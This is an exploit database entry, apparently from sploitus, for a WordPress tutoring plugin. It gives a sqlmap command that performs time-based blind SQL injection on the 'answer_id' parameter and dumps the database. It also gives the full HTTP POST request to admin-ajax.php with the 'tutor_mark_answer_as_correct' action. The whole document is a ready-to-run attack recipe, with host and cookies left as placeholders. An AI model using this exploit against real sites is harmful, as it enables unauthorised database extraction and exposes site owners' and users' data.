Share
## https://sploitus.com/exploit?id=WPEX-ID:D5A00322-7098-4F8D-8E5E-157B63449C17
python3 sqlmap.py -r ~/tutortime.txt --dbms=mysql --technique=T -p answer_id --dump
Where tutortime.txt is
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [URL]
Content-Length: 74
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: [URL]
Referer: [URL]
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [COOKIES]
Connection: close
action=tutor_mark_answer_as_correct&answer_id=1&inputValue=1